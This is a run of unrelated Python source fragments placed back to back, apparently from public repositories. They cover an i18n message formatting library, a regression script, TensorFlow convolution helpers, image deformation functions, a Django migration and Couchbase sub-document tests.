which turns I18NMessage into strings.''' def __init__(self, ts, locale): self.ts = ts self.locale = locale def format(self, inst): return self.ts.translate(inst, self.locale) class I18nMessageFormatterFactory(object): def __init__(self, ts): self.ts = ts def can_handle(self, inst): return isinstance(inst, I18NMessage) def create_formatter(self, locale): # Maybe cache formatter per locale? return I18nMessageFormatter(self.ts, locale) class ListFormatter(DetailFormatter): def __init__(self, ts, locale, **options): self.ts = ts self.locale = locale self.options = options self.empty_message = I18NMessage('pdark.i18n.list.empty') self.comma_message = I18NMessage('pdark.i18n.list.comma') self.and_message = I18NMessage('pdark.i18n.list.and') self.or_message = I18NMessage('pdark.i18n.list.or') def format(self, inst): if len(inst) == 0: return self.ts.translate(self.empty_message, self.locale) def process(item): options = {} formatter = self.ts.formatter_factory.create_formatter(self.locale, item, options) return formatter.format(item) as_strings = [process(item) for item in inst] if len(inst) == 1: return as_strings[0] tail = as_strings[-1] head = as_strings[0:-1] if len(head) > 1: joiner = self.ts.translate(self.comma_message, self.locale) head = joiner.join(head) else: head = head[0] # TODO "neither...nor" joiner = self.ts.translate(self.get_tail_joiner(), self.locale) return joiner.join((head, tail)) def get_tail_joiner(self): if self.options.get('type') == 'or': return self.or_message return self.and_message class ListFormatterFactory(DetailFormatterFactory): def __init__(self, ts): self.ts = ts def can_handle(self, inst): return isinstance(inst, (list, tuple)) def create_formatter(self, locale, **options): return ListFormatter(self.ts, locale, **options) class NumberFormatter(DetailFormatter): def __init__(self, ts, locale, plural=None): self.ts = ts self.locale = locale self.plural_message_base = None self.plural_message_base = plural self.int_message = I18NMessage('pdark.i18n.number.int') self.float_message = I18NMessage('pdark.i18n.number.float') def format(self, inst): message = self.int_message if isinstance(inst, int) else self.float_message spec = self.ts.translate(message, self.locale) if self.plural_message_base is None: # Note: There is no simple way to format a number according to a locale without breaking stuff. # Use the formatter from pdark.i18n.babel if you need locale aware formatting of numbers. return spec % inst if inst == 0: text = self.get_plural_message('zero') elif inst == 1: text = self.get_plural_message('one') elif inst == 2: text = self.get_plural_message('two') else: # TODO how to handle "few" and "many"? text = self.get_plural_message('other') return '%s %s' % (spec % inst, text) def get_plural_message(self, tag): key = self.plural_message_base + '.one' message = I18NMessage(key) try: return self.ts.translate(message, self.locale) except I18nException: if tag == 'other': raise key = self.plural_message_base + '.other' message = I18NMessage(key) return self.ts.translate(message, self.locale) class NumberFormatterFactory(DetailFormatterFactory): def __init__(self, ts): self.ts = ts def can_handle(self, inst): return isinstance(inst, (int, float)) def create_formatter(self, locale, **options): return NumberFormatter(self.ts, locale, **options) class DefaultFormatterFactory(object): '''A factory to create formatters for various objects.''' def __init__(self, ts): self.ts = ts self.delegates = [ StringFormatterFactory(), I18nMessageFormatterFactory(ts), ListFormatterFactory(ts), NumberFormatterFactory(ts), ] self.cache = {} def register(self, *delegates): self.delegates.extend(delegates) def create_formatter(self, locale, inst, options): delegate = self.cache.get(type(inst)) if delegate is not None: return delegate.create_formatter(locale, **options) for delegate in self.delegates: if delegate.can_handle(inst): self.cache[type(inst)] = delegate return delegate.create_formatter(locale, **options) raise I18nException('No factory can handle %s %r' % (type(inst), inst,)) class I18nException(Exception): pass class MissingTextStrategy(object): '''Strategy how to handle missing texts.''' pass class LogMissingTextStrategy(MissingTextStrategy): '''Just log missing texts and directly convert the I18N message to string. This strategy is most useful during production when you don't want the application to stop working just because a translation is missing.''' def __init__(self): super(LogMissingTextStrategy, self).__init__() self.log = getLogger(self) def apply(self, i18n_message, locale): self.log.warn('Missing text for %r', i18n_message.key) return text_message_formatter(repr(i18n_message)) class FailOnMissingTextsStrategy(MissingTextStrategy): '''Throw an exception on missing texts. This strategy is most useful during development to catch problems early.''' def __init__(self): super(FailOnMissingTextsStrategy, self).__init__() def apply(self, i18n_message, locale): raise I18nException('Missing text for %r' % i18n_message.key) class MessageProvider(object): '''Get the MessageFormatter instance which knows how to build the text for an I18NMessage. Create a new instance of this type if you have a new source for texts.''' def __init__(self, missing_text_strategy=None): self.log = getLogger(self) self.missing_text_strategy = self.create_missing_text_strategy(missing_text_strategy) def create_missing_text_strategy(self, missing_text_strategy): if missing_text_strategy is None: return FailOnMissingTextsStrategy() return missing_text_strategy def lookup_message(self, i18n_message, locale): '''Return an instance of MessageFormatter.''' return self.missing_text_strategy.apply(i18n_message, locale) class SimpleMessageProvider(MessageProvider): '''Very simple implementation of a message provider which allows to add messages to a pool. ''' def __init__(self, default_locale, parser, missing_text_strategy=None, locale_fallback_strategy=None): super(SimpleMessageProvider, self).__init__(missing_text_strategy) self.default_locale = default_locale self.parser = parser self.pattern_cache = collections.defaultdict(dict) self.locale_fallback_strategy = self.create_locale_fallback_strategy(locale_fallback_strategy) def create_locale_fallback_strategy(self, locale_fallback_strategy): if locale_fallback_strategy is None: return LocaleFallbackStrategy(self.default_locale) return locale_fallback_strategy def register_message(self, key, locale, pattern): keys = self.pattern_cache[locale] # TODO lazy parsing since we don't need all the messages at once and we probably never need all of them keys[key] = self.parser.parse(pattern) def lookup_message(self, i18n_message, locale): fallback_locales = self.locale_fallback_strategy.apply(locale) key = i18n_message.key self.log.debug('Looking for %r with locales %r', key, fallback_locales) for lc in fallback_locales: formatter = self.lookup_single_locale(key, lc) if formatter is not None: return formatter return self.missing_text_strategy.apply(i18n_message, locale) def lookup_single_locale(self, key, locale): #self.log.debug('lookup_single_locale: Trying %s', locale) keys = self.pattern_cache.get(locale, None) if keys is None: return None formatter = keys.get(key, None) if formatter is not None: self.log.debug('lookup_single_locale: Found key %r for %r', key, locale) return formatter class TranslationService(object): '''This service is the core of the whole system. It connects all the other parts, namely the message provider and the formatter factory.''' def __init__(self, default_locale=None, formatter_factory=None, message_provider=None): self.log = getLogger(self) self.default_locale = self.determine_default_locale(default_locale) self.formatter_factory = self.create_formatter_factory(formatter_factory) self.message_provider = self.create_message_provider(message_provider) def determine_default_locale(self, default_locale): if default_locale is None: return locale.getdefaultlocale()[0] return default_locale def create_formatter_factory(self, formatter_factory): if formatter_factory is None: return DefaultFormatterFactory(self) return formatter_factory def create_message_provider(self, message_provider): if message_provider is None: parser = MessageParser(self) return SimpleMessageProvider(self.default_locale, parser) return message_provider def translate(self, i18n_message, locale=None): '''Translate a I18N message: Get the message itself from the message provider and format it using the arguments.''' try: if locale is None: locale = i18n_message.locale if locale is None: locale = self.default_locale formatter = self.message_provider.lookup_message(i18n_message, locale) if formatter is None: raise I18nException('Missing formatter for %r, locale=%r' % (i18n_message, locale)) args = i18n_message.args kwargs = i18n_message.kwargs try: result = formatter.format(locale, args, kwargs) except Exception as e: raise I18nException('Error formatting with %r, args=%r, kwargs=%r: %s' % (formatter, args, kwargs, e)) from e return result except Exception as e: raise I18nException('Error translating %r, locale=%r: %s' % (i18n_message, locale, e)) from e class LocaleFallbackStrategy(object): '''Determine the order in which locales will be searched. This strategy will strip details from the end of the locale: 'de_CH' with a default 'en_US' will search 'de_CH', 'de', 'en_US' and 'en'.''' def __init__(self, default_locale): self.default_locale = default_locale def apply(self, locale): result = [] self.split_locale(result, locale) self.split_locale(result, self.default_locale) return result def split_locale(self, result, locale): while locale is not None: result.append(locale) pos = locale.rfind('_') if pos < 0: break locale = locale[:pos] class Fragment(object): pass class TextFragment(Fragment): '''A plain text fragment of a message.''' def __init__(self, text): self.text = text def append_to(self, buffer, locale, args, kwargs): buffer.write(self.text) def __repr__(self): return 'text(%r)' % self.text class ArgumentFragment(Fragment): '''A fragment which references a parameter of the I18N message.''' def __init__(self, ts, ref, options): self.ts, self.ref, self.options = ts, ref, options def append_to(self, buffer, locale, args, kwargs): value = self.ref.get(args, kwargs) #print('ref=%r value=%r' % (self.ref, value)) formatter = self.ts.formatter_factory.create_formatter(locale, value, self.options) #print('formatter=%r' % formatter) text = formatter.format(value) buffer.write(text) def __repr__(self): if len(self.options) == 0: return 'arg(%r)' % (self.ref,) return 'arg(%r, %r)' % (self.ref, self.options) class IndexRef(object): '''Access a parameter by index (0, 1, ... n)''' def __init__(self, index): self.index = index def get(self, args, kwargs): return args[self.index] def __repr__(self): return '[%d]' % self.index class NameRef(object): '''Access a parameter by name. This is the preferred way since - it prevents problems when parameters are added or removed - it makes it easier to spot mistakes - people can still have an idea what the parameter means when they translate messages - it's not that much slower ''' def __init__(self, name): self.name = name def get(self, args, kwargs): return kwargs[self.name] def __repr__(self): return '[%r]' % self.name class MessageFormatter(object): '''Efficiently collect all fragments into a single string.''' def __init__(self, fragments): self.fragments = tuple(fragments) def format(self, locale, args, kwargs): buffer = StringIO() for fragment in self.fragments: fragment.append_to(buffer, locale, args, kwargs) return buffer.getvalue() def __repr__(self): return 'MessageFormatter%r' % (self.fragments,) def text_message_formatter(text): '''Convenience function to turn a string into a message.''' return MessageFormatter(TextFragment(text)) class MessageParser(object): '''Parse a pattern into a MessageFormatter. See the method parse() for examples.''' def __init__(self, ts): self.ts = ts def parse(self, message): '''Parse a message. Valid messages are: - strings - lists - tuples When the argument is a list or tuple, then those can contain - strings - dictionaries Strings will be passed verbatim to the output. Dictionaries describe which argument of the I18N method should be formatted and written to the output. The name (string) or index (int) of the argument is passed as value of the key "arg". All other key-value pairs in the dictionary are passed to the detail formatter for this argument type. Examples: > 'text' > ['text'] > ['Hello, ', {'arg': 'name'}] > ['Today is ', {'arg': 'date', 'style': 'long'}] ''' if isinstance(message, str): return MessageFormatter([TextFragment(message)]) fragments = [] try: self.parse0(fragments, message) except Exception as e: raise I18nException('Error parsing %r' % (message,)) from e return MessageFormatter(fragments) def parse0(self, fragments, message): for part in message: if isinstance(part, str): fragments.append(TextFragment(part)) elif isinstance(part, dict): arg = part['arg'] options = dict(part) del options['arg'] if isinstance(arg, int): ref = IndexRef(arg) else: ref = NameRef(arg) fragments.append(ArgumentFragment(self.ts, ref, options)) else: raise I18nException('Unsupported part: %r' % part) import os import numpy as np import matplotlib.pyplot as plt from sklearn import linear_model as lm #function: 時刻同期用関数 #objctive: 線形補間により配列Aの時刻に配列Bの時刻を合わせる #input: 配列A, 配列Bの順.いずれも最初の列が時刻. #outpt: 戻り値は同期後のa,bのデータ def sync(data_a, data_b): cj=1 nrow = data_a.shape[0] ncol = (data_b.shape[1]-1) data_a_sync = data_a[0:,1:] #配列を確保 data_b_sync = np.zeros((nrow, ncol)) for i, a in enumerate(data_a): for j in range(cj, data_b.shape[0]): if a[0]<=data_b[j,0]: #線形補間 t1 = (data_b[j,0] - a[0]) / (data_b[j,0] - data_b[j-1,0]) t2 = (a[0] - data_b[j-1,0]) / (data_b[j,0] - data_b[j-1,0]) data_b_sync[i,] = data_b[j-1,1:] * t1 + data_b[j,1:] * t2 cj = j break return data_a_sync, data_b_sync #function: プロット保存関数 #objctive: xとyの関係を重ねて描画した結果を保存する #input: 1次元x,多次元y,yの次元,xラベル,yラベル,x上下限度,y上下限度,ファイル名 #outpt: なし def savefig(x, ys, dim, xlabel, ylabel, xlim, ylim, filename): fig = plt.figure() ax = fig.add_subplot(1, 1, 1) cm = plt.get_cmap('jet',dim) if dim>1 : for i in range(0,dim): ax.plot(x, ys[0:,i], linestyle='-', color=cm(i), label='chn '+str(i)) else: ax.plot(x, ys, linestyle='-', color=cm(0)) plt.xlim(xlim) ax.set_xlabel(xlabel) plt.ylim(ylim) ax.set_ylabel(ylabel) if dim>1: ax.legend(loc='best') plt.savefig(filename) #function: メイン関数 #objective: 多入力1出力の線形回帰を行う def main(): #データの読み込み data_in = np.loadtxt('data/sample_in.csv', delimiter=',') data_out = np.loadtxt('data/sample_out.csv', delimiter=',') #時系列のデータを保存 tlim = [0,1] #時刻の上下限 input_ylim = [0,1] #inputの上下限 output_ylim = [0,3] #outputの上下限 savefig(data_in[0:,0],data_in[0:,1:],data_in.shape[1]-1,'Time [s]', 'Voltage [V]', tlim, input_ylim, 'data/time-input.png') savefig(data_out[0:,0],data_out[0:,1],1,'Time [s]', 'Displacement [mm]', tlim, output_ylim, 'data/time-out.png') #データの時刻を揃える data_in_sync,data_out_sync = sync(data_in, data_out) np.savetxt('data/sample_in_sync.csv', data_in_sync, delimiter=',') np.savetxt('data/sample_out_sync.csv', data_out_sync, delimiter=',') #各チャンネルの入力と出力関係をプロット for i in range(0,data_in_sync.shape[1]): savefig(data_in_sync[0:,i],data_out_sync[0:,0],1,'Voltage [V]', 'Displacement [mm]', input_ylim, output_ylim, 'data/input'+str(i)+'-output.png') #重回帰分析 clf = lm.LinearRegression() X = data_in_sync Y = data_out_sync[0:,0] clf.fit(X, Y) Y_est = clf.predict(X) Y_bind =np.column_stack([Y,Y_est]) RMSE = np.sqrt(np.dot((Y_est-Y),(Y_est-Y))/Y.shape[0]) #結果の値を表示・推定結果のグラフを保存 print('W=') print(clf.coef_) print('b=') print(clf.intercept_) print('R^2=') print(clf.score(X, Y)) print('RMSE=') print(RMSE) print('NRMSE=') print(RMSE/max(abs(Y))) savefig(data_in[0:,0],Y_bind,2,'Time [s]', 'Displacement [mm]', tlim, output_ylim, 'data/time-result.png') if __name__ == '__main__': main()RunOrVeith/SyNEThesia import tensorflow as tf from tensorflow.python.ops.random_ops import truncated_normal import numpy as np def batch_norm(x, is_train_tensor=None): if is_train_tensor is None: is_training_tensor = tf.get_default_graph().get_tensor_by_name('is_training:0') normed, _, _ = tf.nn.fused_batch_norm(x, scale=tf.ones(shape=(x.get_shape()[-1],)), offset=tf.zeros(shape=(x.get_shape()[-1],)), is_training=is_train_tensor, name=None) return normed def conv2d(x, output_channels, scope=None, kernel=(5, 5), stride=1, use_batchnorm=False, activation=None,): strides = [1, stride, stride, 1] in_dim = x.get_shape().as_list()[-1] with tf.variable_scope(scope or "conv2"): if use_batchnorm: x = batch_norm(x) if activation is not None: x = activation(x) initializer = tf.contrib.layers.xavier_initializer(uniform=True, seed=None, dtype=tf.float32) W = tf.get_variable(name="weight", shape=[*kernel, in_dim, output_channels], dtype=tf.float32, initializer=initializer, trainable=True) b = tf.get_variable(name="bias", shape=[output_channels], dtype=tf.float32, initializer=tf.constant_initializer(0.), trainable=True) x = tf.nn.conv2d(input=x, filter=W, strides=strides, padding='SAME', use_cudnn_on_gpu=True, data_format='NHWC') x = tf.add(x, b) return x def conv2d_transposed(x, output_channels, scope=None, kernel=(4, 4), stride=2, use_batchnorm=False, activation=None): assert isinstance(output_channels, int) assert isinstance(stride, int) channels = max(output_channels, 2) strides = [1, stride, stride, 1] input_channels = x.get_shape()[-1].value with tf.variable_scope(scope or "conv2d_transposed"): if use_batchnorm: x = batch_norm(x) if activation is not None: x = activation(x) input_shape = tf.shape(x) h = input_shape[1] * stride w = input_shape[2] * stride output_shape = tf.stack([input_shape[0], h, w, channels]) bilinear_initializer = bilinear_weight_initializer(filter_size=kernel) W = tf.get_variable(name="weight", shape=[*kernel, channels, input_channels], dtype=tf.float32, initializer=bilinear_initializer, trainable=True) b = tf.get_variable(name="bias", shape=[output_channels], dtype=tf.float32, initializer=tf.constant_initializer(0.), trainable=True) x = tf.nn.conv2d_transpose(value=x, filter=W, output_shape=output_shape, strides=strides, padding='SAME', data_format='NHWC', name="conv2d_transposed") return tf.add(x, b) def bilinear_weight_initializer(filter_size, add_noise=True): def _initializer(shape, dtype=tf.float32, partition_info=None): if shape: # second last dimension is input, last dimension is output fan_in = float(shape[-2]) if len(shape) > 1 else float(shape[-1]) fan_out = float(shape[-1]) else: fan_in = 1.0 fan_out = 1.0 # define weight matrix (set dtype always to float32) weights = np.zeros((filter_size[0], filter_size[1], int(fan_in), int(fan_out)), dtype=dtype.as_numpy_dtype()) # get bilinear kernel bilinear = bilinear_filt(filter_size=filter_size) bilinear = bilinear / fan_out # normalize by number of channels # set filter in weight matrix (also allow channel mixing) for i in range(weights.shape[2]): for j in range(weights.shape[3]): weights[:, :, i, j] = bilinear # add small noise for symmetry breaking if add_noise: # define standard deviation so that it is equal to 1/2 of the smallest weight entry std = np.min(bilinear) / 2 noise = truncated_normal(shape=shape, mean=0.0, stddev=std, seed=None, dtype=dtype) weights += noise return weights return _initializer def bilinear_filt(filter_size=(4, 4)): assert isinstance(filter_size, (list, tuple)) and len(filter_size) == 2 factor = [(size + 1) // 2 for size in filter_size] if filter_size[0] % 2 == 1: center_x = factor[0] - 1 else: center_x = factor[0] - 0.5 if filter_size[1] % 2 == 1: center_y = factor[1] - 1 else: center_y = factor[1] - 0.5 og = np.ogrid[:filter_size[0], :filter_size[1]] kernel = (1 - abs(og[0] - center_x) / factor[0]) * (1 - abs(og[1] - center_y) / factor[1]) return kernel def residual_block(x, output_channels, scope=None, use_batchnorm=False, activation=None): with tf.variable_scope(scope or "residual_block"): shortcut = x input_channels = x.get_shape()[-1] x = conv2d(x=x, output_channels=output_channels, scope='conv_1', kernel=(3, 3), stride=1, use_batchnorm=use_batchnorm, activation=activation) x = conv2d(x=x, output_channels=output_channels, scope='conv_2', kernel=(3, 3), stride=1, use_batchnorm=use_batchnorm, activation=activation) if input_channels != output_channels: shortcut = conv2d(x=shortcut, output_channel=output_channels, scope='conv_1x1', use_batchnorm=False, kernel=(1, 1), stride=1, activation=None) return tf.add(shortcut, x) 100-1000 import numpy as np import os from PIL import Image def repeat_channel(img): new_shape = list(img.shape) + [3] img = np.repeat(img, 3).reshape(new_shape) return img def get_new_idx(x, lam=1.0, a=0., b=0.5): g = (2 * b - 2 * a) * x + 2 * a f = x + 0.5 * lam * x * (np.sin(g) - np.sin(2 * b)) return f def dfx(x, lam, a, b): g = (2 * b - 2 * a) * x + 2 * a df = 1 + 0.5 * lam * (np.sin(g) - np.sin(2 * b)) + lam * x * (b - a) * np.cos(g) return df def check_param(lam, a, b): xs = np.linspace(0., 1., 100) df = dfx(xs, lam, a, b) if np.min(df) < 0: print('The param is Not valid, df_min={:.4f}, please check.'.format(np.min(df))) return False print('The param is Valid!') return True def deform_x(img_arr, lam, a, b): height, width = img_arr.shape idxs = np.arange(width) / float(width - 1) new_idxs = get_new_idx(idxs, lam, a, b) new_idxs = np.floor(new_idxs * (width - 1)).astype(int) lost_idxs = sorted(set(list(range(width))) - set(new_idxs)) new_img = np.zeros_like(img_arr, dtype=np.uint8) for i, new_idx in enumerate(new_idxs): new_img[:, new_idx] |= img_arr[:, i] for lost_idx in lost_idxs: new_img[:, lost_idx] |= new_img[:, lost_idx - 1] return new_img def deform_y(img_arr, lam, a, b): height, width = img_arr.shape idxs = np.arange(height) / float(height - 1) new_idxs = get_new_idx(idxs, lam, a, b) new_idxs = np.floor(new_idxs * (height - 1)).astype(int) lost_idxs = sorted(set(list(range(height))) - set(new_idxs)) new_img = np.zeros_like(img_arr, dtype=np.uint8) for i, new_idx in enumerate(new_idxs): new_img[new_idx] |= img_arr[i] for lost_idx in lost_idxs: new_img[lost_idx] |= new_img[lost_idx - 1] return new_img def deform_xy(img_arr, lam1, a1, b1, lam2, a2, b2): if len(img_arr.shape) == 3: img_arr = img_arr[:, :, 0] if a1 != b1: img_arr = deform_x(img_arr, lam1, a1, b1) if a2 != b2: img_arr = deform_y(img_arr, lam2, a2, b2) img_arr = repeat_channel(img_arr) return img_arr def erase(image, part): assert(image.shape[0] % 2 ==0 and image.shape[1] % 2 ==0) if part == 0: zero_part = np.zeros([image.shape[0] // 2, image.shape[1], image.shape[2]], dtype=np.uint8) return np.concatenate((image[0 : image.shape[0] // 2, :], zero_part), axis = 0) if part == 1: zero_part = np.zeros([image.shape[0], image.shape[1] // 2, image.shape[2]], dtype=np.uint8) return np.concatenate((zero_part, image[:, image.shape[1] // 2 : ]), axis = 1) if part == 2: zero_part = np.zeros([image.shape[0] // 2, image.shape[1], image.shape[2]], dtype=np.uint8) return np.concatenate((zero_part, image[image.shape[0] // 2 : , : ]), axis = 0) if part == 3: zero_part = np.zeros([image.shape[0], image.shape[1] // 2, image.shape[2]], dtype=np.uint8) return np.concatenate((image[ : , 0 : image.shape[1] // 2], zero_part), axis = 1)djordjetrajkovic/presqt1-10 def calculate_job_percentage(total_files, files_finished): """ Do some maths to calculate the job percentage :) Parameters ---------- total_files: int Total number of files for a job files_finished: int Files finished for a job Returns ------- An int representation of the job percentage """ job_percentage = 0 if total_files != 0 and files_finished != 0: job_percentage = round(files_finished / total_files * 100) # Little bit of a hack here, the front end doesn't build resources as fast as they are # returned so to get around the FE hanging on 100% for a few seconds, we'll display 99. if job_percentage == 100: job_percentage = 99 return job_percentage# Generated by Django 3.0.6 on 2020-05-15 17:57 from django.conf import settings from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Research', fields=[ ('timestamp', models.DateTimeField(auto_now_add=True)), ('uuid_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), ('content', models.TextField(max_length=280)), ('reply', models.BooleanField(default=False, verbose_name='Is a reply?')), ('meta_url', models.CharField(max_length=2048, null=True)), ('meta_type', models.CharField(max_length=255, null=True)), ('meta_title', models.CharField(max_length=255, null=True)), ('meta_description', models.TextField(max_length=255, null=True)), ('meta_image', models.CharField(max_length=255, null=True)), ('liked', models.ManyToManyField(blank=True, related_name='liked_research', to=settings.AUTH_USER_MODEL)), ('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='thread', to='research.Research')), ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='publisher2', to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name': 'Research', 'verbose_name_plural': 'Research', 'ordering': ('-timestamp',), }, ), ] sumedhpb/testrunner import logger import unittest from membase.helper.rebalance_helper import RebalanceHelper from couchbase_helper.cluster import Cluster from basetestcase import BaseTestCase from remote.remote_util import RemoteMachineShellConnection from membase.helper.subdoc_helper import SubdocHelper from random import randint class SubdocSanityTests(unittest.TestCase): def setUp(self): self.log = logger.Logger.get_logger() self.helper = SubdocHelper(self, "default") self.helper.setup_cluster() self.cluster = Cluster() self.servers = self.helper.servers def tearDown(self): self.helper.cleanup_cluster() def test_simple_dataset_sanity(self): self.test_simple_dataset_get() self.test_deep_nested_dataset_get_dict() self.test_deep_nested_dataset_get_array() self.test_simple_dataset_dict_upsert() self.test_simple_dataset_dict_add() self.test_simple_dataset_remove() self.test_simple_dataset_exists() self.test_simple_dataset_replace() self.test_simple_dataset_array_push_last() self.test_simple_dataset_array_push_first() self.test_simple_dataset_counter() self.test_simple_dataset_array_add_unique() self.test_simple_dataset_counter() def test_simple_dataset_get(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple get sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() data_set.get_all_docs(inserted_keys, path = 'isDict') data_set.get_all_docs(inserted_keys, path='geometry.coordinates[0]') data_set.get_all_docs(inserted_keys, path='dict_value.name') data_set.get_all_docs(inserted_keys, path='array[0]') data_set.get_all_docs(inserted_keys, path='array[-1]') ''' This should go into ErrorTesting ''' #self.assertFalse(data_set.get_all_docs(inserted_keys, path='array[-5]')) #self.assertFalse(data_set.get_all_docs(inserted_keys, path=' ')) def test_deep_nested_dataset_get_dict(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue get sub doc on deep nested single path on dictionaries " "dataset with {0} docs".format(num_docs)) data_set = DeeplyNestedDataSet(self.helper, num_docs) inserted_keys, levels = data_set.load() '''Top level element''' #data_set.get_all_docs(inserted_keys, path = 'number', check_data=levels) data_set.get_all_docs(inserted_keys, path = 'array') data_set.get_all_docs(inserted_keys, path = 'array[0]') '''Last element Dictionary''' self.log.info('Testing last element dictionary') data_set.get_all_docs(inserted_keys, path = self._get_path('child', levels-1)) '''Last element Dict.Array''' self.log.info('Testing Dict.Array') data_set.get_all_docs(inserted_keys, path = self._get_path('child', levels-2)+'.array[0]') '''Intermediate element Dict.Array''' self.log.info('Testing Intermediate element Dict. Array') data_set.get_all_docs(inserted_keys, path = self._get_path('child', levels//2)+'.array[0]') def test_deep_nested_dataset_get_array(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue get sub doc on deep nested single path on dictionaries " "dataset with {0} docs".format(num_docs)) data_set = DeeplyNestedDataSet(self.helper, num_docs) inserted_keys, levels = data_set.load() '''Top level element''' data_set.get_all_docs(inserted_keys, path = 'number') data_set.get_all_docs(inserted_keys, path = 'array') data_set.get_all_docs(inserted_keys, path = 'array[0]') '''Last element Array''' last_path ='child' for i in range(levels-1): last_path +='.child' data_set.get_all_docs(inserted_keys, path = last_path) '''Last element Array of Array''' last_path ='child' for i in range(levels-3): last_path +='.child' last_path +='.array[-1][-1][-1]' data_set.get_all_docs(inserted_keys, path = last_path) '''Intermediate element Array''' last_path ='child' for i in range(levels//2): last_path +='.child' last_path +='.array[0][-1]' data_set.get_all_docs(inserted_keys, path = last_path) def test_simple_dataset_dict_upsert(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple upsert dict sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(1000) data_set.upsert_all_docs(inserted_keys, replace_string, path='isDict') data_set.upsert_all_docs(inserted_keys, replace_string, path='geometry.coordinates[0]') data_set.upsert_all_docs(inserted_keys, replace_string, path='dict_value.name') data_set.upsert_all_docs(inserted_keys, "999", path='height') data_set.upsert_all_docs(inserted_keys, replace_string, path='array[-1]') def test_simple_dataset_dict_add(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple add dict sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(1000) #data_set.add_all_docs(inserted_keys, replace_string, path='isDict') #data_set.add_all_docs(inserted_keys, replace_string, path='geometry.coordinates[0]') data_set.add_all_docs(inserted_keys, replace_string, path='dict_value') #data_set.add_all_docs(inserted_keys, "999", path='height') #data_set.add_all_docs(inserted_keys, replace_string, path='array[-1]') def test_simple_dataset_remove(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple remove sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() data_set.remove_all_docs(inserted_keys, path='isDict') data_set.remove_all_docs(inserted_keys, path='geometry.coordinates[0]') data_set.remove_all_docs(inserted_keys, path='dict_value.name') data_set.remove_all_docs(inserted_keys, path='array[0]') data_set.remove_all_docs(inserted_keys, path='array[-1]') def test_simple_dataset_exists(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple exists sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' add test code to accept Bool values and not error out ''' data_set.exists_all_docs(inserted_keys, path='isDict') data_set.exists_all_docs(inserted_keys, path='geometry.coordinates[0]') data_set.exists_all_docs(inserted_keys, path='dict_value.name') data_set.exists_all_docs(inserted_keys, path='array[0]') data_set.exists_all_docs(inserted_keys, path='array[-1]') def test_simple_dataset_replace(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple replace sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) data_set.replace_all_docs(inserted_keys, replace_string, path='isDict') data_set.replace_all_docs(inserted_keys, replace_string, path='geometry.coordinates[0]') data_set.replace_all_docs(inserted_keys, replace_string, path='dict_value.name') data_set.replace_all_docs(inserted_keys, "999", path='height') data_set.replace_all_docs(inserted_keys, replace_string, path='array[-1]') def test_simple_dataset_array_push_last(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple array_push_last sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.array_push_last(inserted_keys, replace_string, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.array_push_last(inserted_keys, "999", path='height') data_set.array_push_last(inserted_keys, replace_string, path='array') def test_simple_dataset_array_push_first(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple array_push_first sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.array_push_first(inserted_keys, replace_string, path='geometry.coordinates') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') #data_set.array_push_last(inserted_keys, "999", path='height') data_set.array_push_first(inserted_keys, replace_string, path='array') def test_simple_dataset_counter(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple counter sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing path strings ''' replace_string = self.generate_string(10) #Should be a negative testcase below. #data_set.array_push_last(inserted_keys, replace_string, path='isDict') data_set.counter_all_paths(inserted_keys, path='geometry.coordinates[0]') #data_set.array_push_last(inserted_keys, replace_string, path='dict_value.name') data_set.counter_all_paths(inserted_keys, path='height') #data_set.counter_all_paths(inserted_keys, path='array') def test_simple_dataset_array_add_unique(self): num_docs = self.helper.input.param("num-docs") self.log.info("description : Issue simple add array unique sub doc single path " "dataset with {0} docs".format(num_docs)) data_set = SimpleDataSet(self.helper, num_docs) inserted_keys = data_set.load() ''' Randomly generate 1000 long string to replace existing 